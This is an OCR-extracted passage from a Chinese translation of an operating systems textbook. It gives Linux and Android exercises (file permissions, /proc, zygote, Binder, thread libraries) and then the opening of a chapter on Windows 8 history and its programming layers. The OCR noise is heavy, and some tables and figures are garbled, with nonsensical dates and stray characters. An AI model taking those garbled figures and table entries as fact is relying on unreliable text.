一 个 教授 通过 把 文件 放 在 计算 机 科学 学 院 的 
Linux 系 统 中 的 一 个 公共 可 访问 的 目录 下 来 与 
他 的 学 生 共享 文件 。 一 天 他 意识 到 前 一 天 放 在 
那 的 一 个 文件 变 成 全 局 可 写 的 了 。 他 改变 了 权 
限 并 验证 了 这 个 文件 与 他 的 原件 是 一 样 的 。 第 
二 天 他 发 现 文件 已 经 被 修改 了 。 这 种 情况 为 什 
么 会 发 生 ， 又 如 何 预防 呢 ? 
Linux 支 持 系统 调用 fsuid ， 它 与 setuid 不 同 。 
setuid 人 允许 使 用 者 拥有 与 他 运行 的 程序 相关 的 
有 效 id 的 所 有 权利 ， 而 fsuid 只 准许 正在 运行 程 
序 的 使 用 者 拥有 特殊 的 权利 , 只 能 够 访问 文件 。 
这 个 特性 为 什么 有 用 ? 
在 Linux 系 统 中 ， 进 入 /proc/#### 目 录 ， 其 中 
#### 是 一 个 正在 运行 的 进程 对 应 的 十 进 制 数 。 
给 下 边 的 问题 一 个 合理 的 解释 : 
(a) 在 这 个 目录 中 大 多 数 文件 的 大 小 是 多 少 ? 
(b) 大 多 数 文 件 的 时 间 和 日 期 设置 是 什么 ? 
(c) 提供 什么 类 型 的 访问 权限 给 用 户 以 访问 这 
些 文件 ? 


:如果 你 正在 写 一 个 Android 的 活动 ， 用 来 在 浏 


览 器 中 显示 一 个 Web 页 面 ， 在 不 失去 任何 重要 
内 容 的 情况 下 ， 如 何 实现 其 活动 状态 保存 的 状 
态 量 最 小 化 ? 


. 如果 你 在 Android 上 编写 利用 socket 下 载 文 件 这 


样 的 与 网 络 相关 的 代码 ， 这 和 在 一 个 标准 的 
Linux 系 统 上 编写 时 有 哪些 不 同 呢 ? 


. 如 果 你 正在 为 系统 设计 类 似 Android 的 zygote 进 


程 , 它 创建 的 每 个 进程 中 都 将 有 多 个 线程 运行 。 
你 会 希望 在 zygote 中 启动 这 些 线程 还 是 在 fork 
操作 之 后 ? 

设想 你 使 用 Android 的 Binder IPC 来 发 送 一 个 对 
象 给 另 一 个 进程 。 稍 后 返回 了 一 个 对 象 ， 你 发 
现 它 与 你 之 前 发 送 的 对 象 相 同 。 对 于 进程 中 的 
调用 ， 你 可 以 做 什么 假设 或 不 能 做 什么 假设 ? 


.考虑 一 个 Android 系 统 ， 启 动 后 紧 接着 的 操作 


如 下 : 

1) 主 应 用 程序 (或 启动 器 ) 被 启动 。 

2) 电子 邮件 应 用 程序 在 后 台 启 动 同步 邮箱 操 
作 。 

3) 用 户 启动 一 个 摄像 头 应 用 程序 。 

4) 用 户 启动 浏览 器 应 用 程序 。 

用 户 利用 浏览 器 观看 网 页 需要 越 来 越 多 的 内 存 ， 
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直到 一 切 就 绪 。 在 这 个 过 程 中 发 生 了 什么 ? 

写 一 个 允许 简单 命令 执行 的 最 小 的 shell 并且 
这 些 命令 能 在 后 台 执 行 。 

使 用 汇编 语言 和 BIOS 调 用 ， 写 一 个 在 Pentinum 
类 计算 机 上 从 软盘 上 引导 自己 的 程序 。 这 个 程 
序 应 该 使 用 BIOS 调 用 来 读 取 键 盘 以 及 重复 已 键 
入 的 字符 ， 仅 用 来 证 明 这 个 程序 确实 在 运行 。 


. 写 一 个 能 通过 串口 连接 两 台 Linux 计 算 机 的 哑 


(dumb) 终端 程序 。 使 用 POSIX 终 端 管理 调用 
来 配置 端口 。 

写 一 个 客户 一 服务 器 应 用 程序 ， 应 答 请 求 时 能 
通过 套 接 字 传输 一 个 大 文件 。 使 用 共享 内 存 的 
方法 重新 实现 相同 的 应 用 程序 。 你 觉得 哪个 版 
本 性 能 更 好 ? 为 什么 ?对 你 写 好 的 代码 ， 使 用 
不 同 的 文件 大 小 进行 性 能 的 测量 。 你 观察 到 了 
什么 ?你 认为 在 Linux 内 核 中 发 生 了 什么 导致 
这 样 的 行为 ? 


.实现 一 个 基本 的 用 户 级 线程 库 ， 该 线程 在 
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Linux 的 上 层 运行 。 库 的 API 应 该 包含 函数 调用 ， 
如 mythreads_init、mythreads_create、 
mythreads_join, mythreads_exit, 
mythreads_yield、mythreads_self， 可 能 还 
有 一 些 其 他 的 。 进 一 步 实现 这 些 同 步 变量 ， 以 
便 用 户 能 使 用 安全 的 并 发 操作 : mythreads_ 
mutex_init, mythreads_mutex_lock, 
mythreads_ mutex_unlock。 在 开始 前 ， 清 晰 
地 定义 API 并 说 明 每 个 调用 的 语义 。 接 着 使 用 
简单 的 轮转 抢占 调度 器 实现 用 户 级 的 库 。 还 需 
要 利用 该 库 编 写 一 个 或 更 多 的 多 线程 应 用 程 
序 ， 用 来 测试 线程 库 。 最 后 ， 用 另 一 个 像 本 章 
描述 的 Linux2.6 O(1) 的 调度 策略 替换 简单 的 调 
度 策略 。 使 用 每 种 调度 器 时 比较 你 的 应 用 程序 
的 性 能 。 

编写 一 个 shell 脚 本 , 显示 一 些 重要 的 系统 信息 ， 
例如 运行 的 进程 、 主 目录 和 当前 目录 、 处 理 器 
类 型 、 当 前 的 CPU 利用 率 等 。 
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Modern Operating Systems, Fourth Edition 


实例 研究 2: Windows 8 


Windows 是 一 个 现代 的 操作 系统 ， 可 以 运行 在 消费 型 或 商业 型 桌面 计算 机 、 笔 记 本 电脑 、 平 板 电 
脑 、 智 能 电话 和 企业 服务 器 上 。Windows 同 时 也 是 微软 Xbox 游戏 系统 与 Azure 云 计算 框架 的 操作 系统 。 
最 新 的 桌面 版 本 是 Windows 8.19 。 在 本 章 中 我 们 将 分 析 Windows 8 的 各 个 方面 ， 从 历史 简 述 开始 ， 然 后 
是 系统 的 架构 。 在 此 之 后 我 们 将 看 看 进程 、 内 存 管理 、 缓 存 、 输 入 /输出 、 文 件 系统 、 电 源 管理 ， 最 终 
还 将 关注 一 下 安全 。 


11.1 Windows 8.1 的 历史 


微软 公司 为 桌面 计算 机 和 服务 器 开发 的 操作 系统 可 以 划分 为 四 个 时 代 : MS-DOS、 
Windows、 基 于 NT 的 Windows 和 现代 Windows。 


基于 MS-DOS 的 
从 技术 上 来 说 ， 以 上 的 每 一 种 系统 与 其 他 系统 都 有 本 

























































质 的 不 同 。 在 个 人 计算 机 历史 中 不 同 的 时 代 ， 每 一 种 系统 都 占据 了 主导 地 位 。 图 11-1 显 示 的 是 微软 适用 
于 桌面 计算 机 的 主要 操作 系统 的 发 布 日 期 。 以 下 我 们 简要 描述 表 中 显示 出 的 每 个 时 代 。 
基于 MS- | 基于 NT 的 | me 
年 份 MS-DOS | DOS 的 Windows Windows 
Windows 
1981 1.0 最 初 是 为 IBM PC 发 布 
1983 | 20 
1984 | 30 i = 
1990 3.0 ses 
1991 50 BY p 
3.1 AR ee 
1993 | NT 3.1 
1995 107 si), 2095 ji fi A EWindows 95 中 的 MS-DOS 
1996 NT 4.0 
1998 98 
|_ 2000 8.0 Me 2000 Windows Me 不 如 Windows 98 
2001 XP tkt T Windows 98 
206| | we | Vista CAEP 
2009 7 在 Vista 基 础 上 的 重要 升级 
2012 8 第 一 个 现代 版 本 
2013 | 8a 微软 进入 了 快速 发 布 节奏 

















图 11-1 微软 桌面 PC 的 主要 操作 系统 的 发 布 日 期 


11.1.1 20 世 纪 80 年 代 : MS-DOS 

20 世 纪 80 年 代 初期 的 BM， 是 那 时 世界 上 最 大 和 最 强 的 计算 机 公司 ， 开 发 出 基于 Intel 8088 微 处 理 
器 的 个 人 计算 机 。 自 从 20 世 纪 70 年 代 中 期 开始 ， 微 软 成 为 在 8080 和 Z-80 等 8 位 微 处 理 器 上 提供 BASIC 编 
程 语言 的 领导 者 。 当 IBM 关 于 在 新 型 的 计算 机 上 授权 使 用 BASIC 接 洽 微 软 的 时 候 ， 微 软 赞 同 并 且 建 议 
IBM 联 系 Digital Research 公 司 以 便于 使 用 它 的 CP/M 操 作 系 统 ， 那 时 微软 还 没有 进入 操作 系统 领域 。IBM 
这 样 做 了 ， 但 是 Digital Research 公 司 的 总 裁 Gary Kildall 非 常 繁忙 ， 没 有 时 间 与 BM 继续 商讨 ， 所 以 IBM 


日 ”截至 2017 年 6 月 最 新 的 桌面 版 本 是 Windows 10。 一 一 译 者 注 
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回 到 微软 。 在 很 短 的 时 间 之 内 ， 微 软 从 一 家 本 地 公司 西雅图 计算 机 产品 (Seatle Computer Products) 买 
到 了 一 份 CP/M 的 拷贝 ， 移 植 到 IBM PC 中 ， 并 且 授 权 IBM 使 用 。 这 个 产品 被 命名 为 MS-DOS 1.0 
(MicroSoft Disk Operating System) 并 且 在 1981 年 与 第 一 款 IBM PC 一 同 发 售 。 

MS-DOS 是 一 款 16 位 、 实 时 模式 、 单 一 用 户 、 命 令 行 式 的 操作 系统 ， 包 含 8KB 的 内 存 驻 留 代码 。 在 接 
下 来 的 十 年 里 ，PC 和 MS-DOS 继 续 发 展 ， 增 加 了 更 多 的 特性 和 性 能 。1986 年 当 IBM 基 于 Intel 286 开 始 设计 
PC/AT 时 ，MS-DOS 已 经 增长 到 36KB, 但 是 仍然 是 命令 行 式 、 同 一 时 刻 只 能 运行 一 个 应 用 程序 的 操作 系统 。 


11.1.2 20 世 纪 90 年 代 : 基于 MS-DOS 的 Windows 

由 于 受到 了 斯 坦 福 研究 院 和 Xerox PARC 研 究 的 图 形 用 户 界 面 以 及 他 们 的 商业 产品 一 一 苹果 的 Lisa 和 
Macintosh 的 启发 ， 微 软 决 定 为 MS-DOS 增 加 图 形 用 户 界面 ， 并 命名 为 Windows。Windows 最 初 的 两 个 版 
本 (1985 和 1987) 并 不 成 功 ， 因 为 受到 了 当时 PC 硬件 的 限制 。 在 1990 年 微软 为 Intel 386 发 布 了 Windows 
3.0 版 本 ， 并 且 在 6 个 月 内 销售 了 100 万 份 拷贝 。 

Windows 3.0 不 是 一 款 真正 的 操作 系统 ， 而 是 在 MS-DOS 上 构建 的 图 形 用 户 界面 ， 它 仍然 受到 机 器 和 
文件 系统 的 限制 。 所 有 的 程序 在 同一 地 址 空间 内 运行 而 且 它们 中 的 任何 一 处 bug 都 会 使 得 整个 系统 崩溃 。 

1995 年 8 月 ，Windows 95 发 布 了 。 它 在 一 个 成 熟 的 系统 内 包括 了 许多 特性 ， 包 括 虚 拟 内 存 、 进 程 管 
理 、 多 程序 设计 、32 位 的 程序 接口 。 然 而 ， 它 仍然 缺少 安全 性 ， 并 且 在 操作 系统 和 应 用 程序 之 间 提 供 了 
很 少 的 隔离 措施 。 因 此 这 些 不 稳定 的 问题 仍然 存在 , 在 随后 发 布 的 Windows 98 和 Windows Me 中 也 一 样 。 
在 它们 中 MS-DOS 仍 然 以 16 位 汇编 代码 运行 在 Windows 操 作 系 统 内 核 中 。- 

11.1.3 21 世 纪 00 年 代 : 基于 NT 的 Windows 

20 世 纪 80 年 代 末 ， 微 软 认识 到 继续 开发 以 MS-DOS 为 核心 的 操作 系统 不 是 一 个 最 佳 商业 发 展 方向 。 
计算 机 硬件 在 不 断 地 提高 计算 速度 和 能 力 ， 最 后 PC 市 场 会 出 现 同 桌 面 工 作 站 和 企业 服务 器 的 碰撞 ， 而 在 
这 些 领域 UNIX 操 作 系 统 是 占 优势 的 。 微 软 同 时 也 注意 到 Intel 微 处 理 器 家 族 可 能 不 再 具有 很 大 的 竞争 优 
势 ， 因 为 它 已 经 受到 了 RISC 架 构 的 挑战 。 为 了 解决 这 些 问题 ， 微 软 从 DEC 公 司 招聘 了 由 Dave Cutler 领 
导 的 一 些 工程 师 ，Cutler 是 DEC 的 VMS 操 作 系 统 的 主要 架构 设计 者 之 一 。Cutler 被 指派 开发 一 种 全 新 的 
32 位 操作 系统 用 于 实现 OS/2， 微 软 当 时 与 IJBM 合 作 开发 0S/2 操 作 系 统 的 API 接 口 。 最 初 的 设计 文档 中 ， 
Cutler 的 团队 称 这 种 操作 系统 为 NT OS/2。 

Cutler 的 系统 由 于 包含 很 多 新 技术 被 称 作 NT (New Technology， 也 因为 最 初 的 目标 处 理 器 是 新 型 的 Intel 
860， 代 码 名 称 是 N10)。NT 开 发 的 重点 是 方便 地 
在 不 同 的 处 理 器 之 间 切 换 以 及 安全 性 和 可 靠 性 ， 
并 兼容 基于 MS-DOS 的 Windows 版 本 。Cutler 的 ive. | WARIVMS 32 位 、 虚 拟 内 存 
DEC 工作 背景 展现 在 多 个 方面 ， 有 不 止 一 处 体现 VAXELAN 实时 . 

NT 系统 与 VMS 以 及 其 他 由 Cuder 疫 计 的 系统 的 
相似 性 ， 如 图 11-2 所 示 。 i 

那些 仅仅 熟悉 UNIX 的 程序 员 发 现 NT 的 架 图 11-2 由 Dave Cutler 开发 的 DEC 操作 系统 
构 非 常 不 同 。 这 不 仅仅 是 因为 受到 了 VMS 的 影响 ， 也 是 因为 在 当时 计算 机 系统 的 设计 上 普遍 存在 差异 。 
UNIX 是 在 20 世 纪 70 年 代为 单 处 理 器 、16 位 、 微 内 存 、 切 换 系统 设计 的 ， 那 时 进程 是 最 小 的 并 行 和 组 成 单 
元 。 而 且 fork/exec 是 并 不 消耗 很 多 资源 的 操作 命令 (因为 切换 系统 经 常 通过 磁盘 拷贝 )。NT 是 在 20 世 纪 
90 年 代 初 期 设计 的 ， 当 时 多 处 理 器 、32 位 、 大 容量 存储 、 虚 拟 内 存 系统 已 经 非常 普及 。 在 NT 系统 中 ， 线 
程 是 并 行 单元 ， 动 态 链接 库 是 组 成 单元 ， 并 且 fork/exec 通 过 单一 操作 命令 来 实现 创建 一 个 全 新 的 进程 ， 
然后 运行 男 外 一 个 程序 ， 而 不 需要 首先 复制 一 个 拷贝 。 

第 一 个 基于 NT 的 Windows 版 本 在 1993 年 发 布 ， 它 被 称 作 Windows NT 3.1 是 为 了 匹配 Windows 3.1, 
与 IBM 的 合作 破裂 了 ， 因 为 虽然 仍然 支持 OS/2 界 面 ， 但 主要 界面 是 Windows API 的 32 位 扩展 ， 称 为 
Win32。 在 启动 NT 项 目 到 NT 第 一 次 上 市 的 那 段 时 间 里 ，Windows 3.0 发 布 了 ， 并 且 在 商业 上 取得 了 巨大 
的 成 功 。 它 不 仅 可 以 运行 Win32 程 序 ， 并 且 使 用 Win32 兼 容 库 。 

就 像 基 于 MS-DOS 的 Windows 的 最 初版 本 一 样 ， 基 于 NT 的 Windows 的 最 初版 本 也 不 成 功 。NT 需 要 
更 多 的 内 存 ， 那 时 只 有 很 少 的 32 位 应 用 程序 ， 并 且 与 设备 驱动 和 应 用 程序 的 不 兼容 使 得 许多 消费 者 重新 
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回 到 微软 仍 在 改进 的 基于 MS-DOS 的 Windows 发 布 于 1995 年 的 Windows 95, Windows 95 提 供 像 NT 
一 样 的 原生 32 位 编程 接口 ， 但 是 与 现存 的 16 位 软件 和 应 用 程序 有 更 好 的 兼容 性 。 并 不 使 人 惊奇 的 是 ， 
NT 的 早期 成 功 是 在 服务 器 市 场 与 VMS 和 NetWare 的 竞争 中 取得 的 。 

NT 确实 达到 了 可 移植 性 的 目标 ， 在 后 续 的 1994 年 和 1995 年 发 布 的 版 本 中 增加 了 对 (小 端 ) MIPS 和 
PowerPC 架 构 的 支持 。NT 最 主要 的 升级 是 1996 年 的 Windows NT 4.0。 这 个 系统 具有 较 强 的 性 能 、 安 全 
性 和 可 靠 性 ， 并 且 有 与 Windows 95 同 样 的 用 户 界面 。 z 

图 11-3 显 示 了 Win32 API 和 Windows 之 间 的 关系 。 有 具有 基于 MS-DOS 的 Windows 和 基于 NT 的 
Windows 通 用 的 API 促 成 了 NT 的 成 功 。 


Win32 应 用 程序 
Win32 应 用 编程 接口 


Windows Windows Windwos 
95/98/98SE/Me NT/2000/Vista/7 8/8.1 
图 11-3 Win32 API 允 许 程序 在 几乎 所 有 版 本 的 Windows 上 运行 


这 种 兼容 性 使 得 用 户 可 以 方便 地 从 Windows 95 转 移 到 NT， 操 作 系 统 也 在 高 端的 桌面 计算 机 市 场 和 
服务 器 领域 中 扮演 了 很 重要 的 角色 。 然 而 ， 用 户 并 不 希望 接纳 其 他 处 理 器 架构 ， 在 1996 年 Windows 
NT 4.0 支 持 的 四 种 架构 (在 这 个 版 本 中 增加 了 对 DEC Alpha 的 支持 ) 中 ， 只 有 x86 (就 是 奔腾 家 族 ) 
在 下 一 个 主要 的 版 本 一 一 Windows 2000 中 继续 被 积极 支持 。 

Windows 2000 代 表 了 NT 的 重大 进化 。 增 加 的 关键 技术 包括 即 插 即 用 功能 ( 当 使 用 者 要 安装 新 的 PCI 
卡 时 ， 不 再 需要 更 改 跳 线 ) 、 网 络 目录 服务 (对 于 企业 用 户 ) 、 改 进 的 电源 管理 (对 于 笔记 本 电脑 ) 和 改 
进 的 GUI (对 于 任何 用 户 )。 

Windows 2000 技 术 上 的 成 功 ， 引 导 微 软 在 下 一 个 NT 版 本 Windows XP 中 提高 应 用 程序 和 设备 的 兼 
容 性 ， 而 Windows 98 则 逐步 淡出 市 场 。Windows XP 具 有 更 加 友好 的 新 图 形 界面 ， 并 通过 熟悉 的 环境 吸 
引 消费 者 。 这 一 策略 获得 了 压倒 性 的 成 功 ， 在 最 初 的 几 年 里 ，Windows XP 被 安装 在 数 亿 台 计 算 机 上 ， 
这 使 得 微软 成 功 实现 了 结束 基于 MS-DOS 的 Windows 时 代 这 个 目标 。 

紧 跟着 Windows XP 的 是 令 PC 消费 者 兴奋 的 全 新 体验 一 一 在 2006 年 下 半年 完成 的 Windows Vista， 距 离 
Windows XP 发 布 大 约 五 年 。Windows Vista 声 称 有 全 新 开发 的 图 形 用 户 界面 和 新 的 安全 特性 。 大 多 数 变 化 是 
在 使 用 者 的 可 视 化 体验 和 兼容 性 方面 。 系 统 内 部 的 技术 大 幅度 地 提高 了 ， 进 行 了 很 多 内 部 编码 优化 以 及 性 
能 、 可 伸缩 性 和 可 靠 性 上 的 改善 。Vista 的 服务 器 版 本 (Windows Server 2008) 在 一 年 之 后 发 布 ， 它 与 Vista 具 
有 相同 的 核心 组 件 ， 例 如 内 核 、 驱 动 、 底 层 库 和 程序 。 

关于 早期 开发 NT 的 人 物 历史 在 《Showstopper》 旨 (Zachary，1994) 一 书 里 有 相关 的 介绍 。 书 中 讲 
述 了 很 多 关键 的 人 物 ， 以 及 如 此 庞大 的 软件 开发 项 目的 困难 。 

11.1.4 Windows Vista 

Windows Vista 是 微软 目前 为 止 最 为 全 面 的 操作 系统 。 最 初 的 计划 太 过 于 激进 以 至 于 头 几 年 的 
Vista 开 发 必须 以 更 小 的 范围 重新 开始 。 计 划 严 重 依赖 于 微软 的 类 型 安全 、 垃 圾 回收 、.NET 语 言 C# 等 技 
R, 以 及 一 些 有 意义 的 特性 ， 例 如 用 来 从 多 种 不 同 的 来 源 中 搜索 和 组 织 数 据 的 WinFS 统 一 存储 系统 。 
整个 操作 系统 的 规模 是 相当 惊人 的 。 最 早 NT 系 统 发 行 时 只 有 300 万 行 C/C++ 语 句 ， 到 NT 4 时 增长 到 
1600 万 行 ，2000 是 3000 万 行 ，XP 是 5000 万 行 ， 而 到 了 Vista 已 经 超过 了 7000 万 行 ，Windows 75 
Windows 8 则 更 多 。 
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规模 增 大 的 主要 原因 是 每 次 微软 公司 在 发 行 新 版 本 时 都 增加 一 些 新 功能 。 在 system32 的 主 目录 中 ， 
含有 1600 个 动态 链接 库 (DLL) 和 400 个 可 执行 文件 (EXE) ， 而 这 还 不 包含 让 用 户 网 上 冲浪 、 播 放 音乐 
和 视频 、 发 电子 邮件 、 浏 览 文件 、 整 理 照 片 甚至 制作 电影 等 各 种 应 用 程序 的 目录 。 因 为 微软 想 让 客户 使 
用 新 版 本 ， 所 以 它 兼 容 了 老 版 本 的 所 有 特征 、API、 程 序 (小 的 应 用 软件 ) 等 。 几 乎 很 少 有 功能 被 删 掉 。 
结果 随 着 版 本 的 升级 Windows 系 统 越 来 越 大 。 随 着 科技 的 发 展 ，Windows 发 布 的 载体 也 从 软盘 ，CD 发 展 
到 DVD (Windows Vista) 。 技 术 还 在 持续 发 展 ， 越 来 越 快 的 处 理 器 以 及 越 来 越 大 的 内 存 ， 使 规模 增 大 变 
得 无 关 紧 要 。 

不 幸 的 是 ， 对 于 微软 公司 而 言 ，Windows Vista 的 发 布 时 间 恰 好 赶 上 了 消费 者 对 于 低 价 电脑 (例如 
低 端 笔记 本 电脑 、 网 络 本 等 ) 的 关注 时 期 。 这 些 低 价 电 脑 为 了 市 约 成 本 、 延 长 续航 能 力 而 采用 了 较 之 前 
更 慢 的 处 理 器 以 及 更 小 的 内 存 空间 。 并 且 在 当时 ， 处 理 器 的 速度 增长 也 因为 无 法 处 理 主 频 过 快 产生 的 过 
热 问题 而 停滞 不 前 。 摩 尔 定律 仍 在 生效 ， 但 是 增长 方向 已 经 由 之 前 的 单 处 理 器 加 快 变 为 新 的 功能 和 多 核 
处 理 器 了 。 再 加 上 Vista 的 规模 增 大 ， 直 接 导 致 了 Windows Vista 在 新 机 器 上 的 表现 并 不 如 它 的 前 辈 
Windows XP 那样 优秀 ，Windows Vista 也 因此 未 被 广泛 接受 。 

这 些 出 现在 Windows Vista 上 的 问题 在 它 的 下 一 个 版 本 Windows 7 上 得 到 了 解决 。 微 软 公司 大 量 地 增 
加 了 在 测试 、 性 能 自动 化 、 新 的 检测 技术 上 的 资金 注入 ， 同 时 也 进一步 加 强 了 系统 性 能 、 可 靠 性 和 安全 
性 。 尽 管 Windows 7 相 比 Windows Vista 只 有 为 数 不 多 的 新 功能 ， 但 其 有 更 好 的 工程 实现 及 效率 。 
Windows 7 很 快 就 取代 Vista 以 及 Windows XP， 成 为 目前 为 止 最 受 欢 迎 的 Windows 系 统 。 


11.1.5 21 世 纪 10 年 代 : 现代 Windows 

就 在 Windows 7 发 布 的 时 候 ， 工 业界 再 一 次 发 生 了 一 些 戏剧 性 的 转变 。 苹 果 公 司 的 iPhone 以 及 后 来 
iPad 的 成 功 ， 开 创 了 移动 计算 时 代 。 而 谷歌 公司 低 价 的 安 卓 平板 更 是 统治 了 这 一 市 场 ， 就 像 几 十 年 前 微 
` 软 公司 统治 个 人 计算 机 时 代 一 样 。 这 些小 而 便携 但 是 却 十 分 强大 的 设备 以 及 无 处 不 在 的 快速 网 络 创 造 
了 一 个 由 移动 计算 和 基于 网 络 的 服务 统治 的 新 世界 。 便 携 式 计 算 机 被 这 些 有 着 一 个 小 型 窗口 并 且 运 行 
着 以 网 络 上 下 载 的 应 用 的 设备 取代 了 。 这 些 应 用 并 非 像 传统 应 用 那样 多 样 化 ， 例 如 文字 处 理 、 表 格 处 
理 或 者 连接 到 公司 的 服务 器 。 它 们 提供 了 诸如 网 页 搜索 、 社 交 网 络 、 维 基 百 科 、 流 媒体 音乐 及 视频 、 
电子 购物 及 个 性 化 导航 等 功能 。 而 计算 机 的 商业 模式 也 在 改变 ， 广 告 机 会 已 经 成 为 计算 机 市 场 最 强大 
WARD. 

微软 公司 为 了 与 谷歌 公司 和 苹果 公司 竞争 ， 开 始 将 自己 转变 成 为 一 个 提供 设备 和 服务 的 公司 。 这 需 
要 一 个 可 以 广泛 适 配 于 各 种 设备 的 操作 系统 ， 包 括 智 能 手机 、 平 板 电脑 、 游 戏 中 心 、 笔 记 本 电脑 、 个 人 
计算 机 、 服 务 器 以 及 云 服务 器 。Windows 因 此 经 历 了 一 场 比 Windows Vista 更 大 的 变革 ， 而 变革 的 结果 就 
是 Windows 8。 无 论 如 何 ， 这 一 次 微软 公司 汲取 了 之 前 的 经 验 ， 制 造 了 一 个 工程 完善 、 速 度 优良 且 不 含 
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Windows 8 的 构建 延续 了 其 前 作 Windows 7 所 基于 的 MinWin 模 块 。 该 方法 使 得 操作 系统 内 核 保持 较 
小 的 体积 ， 并 且 可 以 适 配 于 不 同 的 设备 。 这 样 做 的 目的 是 适 配 于 不 同 设备 的 操作 系统 能 保持 相同 的 内 核 
但 有 着 不 同 的 用 户 接口 和 功能 特性 ， 并 且 对 于 用 户 而 言 能 尽 可 能 保持 相同 的 习惯 。 这 一 方法 成 功 地 运用 
于 Windows Phone 8， 该 系统 的 核心 代码 大 部 分 与 桌面 及 服务 器 版 Windows 一 样 。 支 持 智能 手机 以 及 平 
板 设备 需要 Windows 同 时 支持 流行 的 ARM 架 构 ， 以 及 Intel 针 对 这 些 设备 的 新 处 理 器 。 而 让 Windows 8 进 
入 现代 Windows 时 代 的 原因 是 基本 编程 模式 的 改变 ， 这 些 改变 我 们 会 在 下 一 节 进 行 讨论 。 

Windows 8 并 没有 得 到 广泛 的 称赞 。 特 别 是 任务 栏 上 开始 按钮 及 其 相关 菜单 的 移 除 被 许多 用 户 认 为 
是 一 个 巨大 的 错误 。 此 外 还 有 一 些 批 评 针 对 的 是 其 在 桌面 电脑 上 使 用 了 类 似 于 平板 的 用 户 界面 。 微 软 公 
司 针对 这 些 批 评 在 2013 年 5 月 14 日 发 布 了 一 个 更 新 版 一 一 Windows 8.1。 该 版 本 修复 了 这 个 几 个 问题 并 增 
加 了 一 些 新 的 功能 ， 例 如 更 好 的 云 服 务 整 合 ， 以 及 几 个 新 的 程序 。 在 本 章 中 ， 我 们 仍然 使 用 更 为 广泛 的 
名 字 Windows 8， 但 实际 上 我 们 讨论 的 是 Windows 8.1, 


11.2 Windows 编 程 
现在 开始 Windows 的 技术 细节 研究 。 但 是 ， 在 研究 详细 的 内 部 结构 之 前 ， 我 们 会 看 看 原始 的 NT 系 
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统 调 用 接口 ， 然 后 是 基于 NT 的 Windows 中 引入 的 Win32 编 程 子 系统 ， 以 及 Windows 8 中 的 现代 WinRT 编 
程 模式 。 

图 11-4 显 示 了 Windows 操 作 系 统 的 各 个 层次 。 在 Windows 应 用 程序 和 图 形 层 下 面 是 构造 应 用 程序 的 
编程 接口 。 和 大 多 数 操作 系统 一 样 ， 这 些 接口 主要 包括 了 代码 库 (DLL) ， 这 些 代 码 库 可 以 被 应 用 程序 
动态 链接 以 访问 操作 系统 功能 。Windows 也 包含 一 些 被 实现 为 以 单独 进程 运行 的 服务 的 编程 接口 。 应 用 
软件 通过 远程 过 程 调用 (RPC) 与 用 户 态 服 务 进行 通信 。 


现代 Windows 应 用 Windows 服 务 Windows 桌 面 应 用 


现代 应 用 管理 器 现代 中 介 进 程 桌面 管理 器 (explorer) 
© 


WinRT:.NET/C++, WWA/JS | | NT 服务 :smss, Isass, [.NET: 基础 类 ，GC] 
services, winlogon GUI(shell32, user32, gdi32) 
: 容 : 


动态 库 (ole, rpc) 
子 系统 API (kernel32) 





Win32 子 系统 进程 
进程 生命 周期 管理 (csrss.exe ) 
用 户 态 原生 NT API,C/C++ 运 行 时 (ntdll.dl1) 


内 核 态 NTOS 内 核 层 (ntoskrnl.exe) 


驱动 : 设备 ,文件 NTOS 执 行 体 层 GUI 驱动 
系统 ， 网 络 (ntoskrnl.exe) (Win32k.sys) 


硬件 抽象 层 (hal.dll) 


管理 程序 (hvix, hvax) 


图 11-4 现代 Windows 的 编程 层 


NT 操作 系统 的 核心 是 NTOS 内 核 态 程 序 (ntoskrnl.exe) ， 它 提供 了 实现 操作 系统 的 其 他 部 分 所 需要 
的 传统 系统 调用 接口 。 在 Windows 中 ， 只 有 微软 的 程序 员 编写 系统 调用 层 。 已 经 公开 的 用 户 态 接口 属于 
操作 系统 本 身 ， 它 通过 运行 在 NTOS 层 顶层 的 子 系统 (subsystem) 来 实现 。 

最 早 的 NT 支持 三 个 子 系统 : OS/2, POSIX, Win32, OS/27EWindows XP 中 已 经 不 使 用 了 ，POSIX 
也 终于 在 Windows 8.1 中 被 移 除 了 。 如 今 所 有 的 微软 程序 都 构建 在 Win32 子 系统 之 上 ， 例 如 .NET 框 架 下 
的 WinFX API。WinFX 包 含 了 许多 Win32 中 的 功能 ， 实 际 上 许多 WinFX 基 础 类 库 (Base Class Libray) 只 
是 Win32 API 上 的 一 层 封装 。WinFX 的 优势 在 于 处 理 大 量 新 的 对 象 类 型 ， 对 于 接口 的 持续 简化 ， 以 及 采 
用 了 .NET 框 架 中 的 CLR (Common Language Run-time) 及 垃圾 回收 处 理 。 

现代 Windows 从 Windows 8 开始 。 从 这 一 代 起 ，Windows 引 入 了 全 新 的 API 一 一 WinRT。Windows 8 
反对 传统 的 Win32 桌 面 程序 运行 的 方式 : 同一 时 间 在 单个 窗口 内 只 运行 单个 应 用 。 微 软 公司 意识 到 了 将 
单一 的 操作 系统 转变 为 适 配 于 智能 手机 、 平 板 电脑 、 游 戏 主 机 以 及 传统 的 个 人 计算 机 和 服务 器 等 多 平台 
的 操作 系统 的 必要 性 。GUI 必 须 实现 于 新 的 API 来 适应 这 一 改变 ， 因 此 微软 公司 开发 了 Modern Software 
Devlopment Kit, #€4% [WinRT API。 该 API 辅 助 创 造 了 一 系列 的 行为 和 交互 方式 。 这 些 API 拥 有 
C++、.NET 以 及 JavaScript 版 本 ， 运 行 于 类 似 于 浏览 器 的 环境 下 ， 例 如 wwa.exe (Windows Web 
Application ) 。 

除了 WinRT API 之 外 , 还 有 许多 已 经 存在 的 Win32 API 被 收录 在 MSDK (Microsoft Development Kit ) 
之 中 。 原 始 的 WinRT API 并 不 足以 写 出 许多 程序 ， 其 中 的 一 些 Win32 API 是 用 于 限制 应 用 程序 的 行为 的 。 
举例 来 说 ， 应 用 无 法 使 用 MSDK 来 直接 创建 线程 ， 而 是 必须 依赖 于 Win32 线 程 池 来 运行 同一 进程 中 的 并 
发 事件 。 这 是 因为 现代 Windows 由 原本 的 线程 模型 转化 为 任务 模式 ， 以 解决 在 编程 模型 (尤其 是 并 发 模 
型 ) 中 出 现 的 资源 管理 问题 (优先 级 、CPU 调 度 等 )。 此 外 ， 其 他 被 删除 的 API 还 包括 Win32 中 的 虚拟 内 
存 API， 和 希望 程序 员 采 用 Win32 堆 管理 API 而 不 是 直接 对 内 存 进 行 管理 。 此 外 那些 之 前 在 Win32 中 就 被 删 
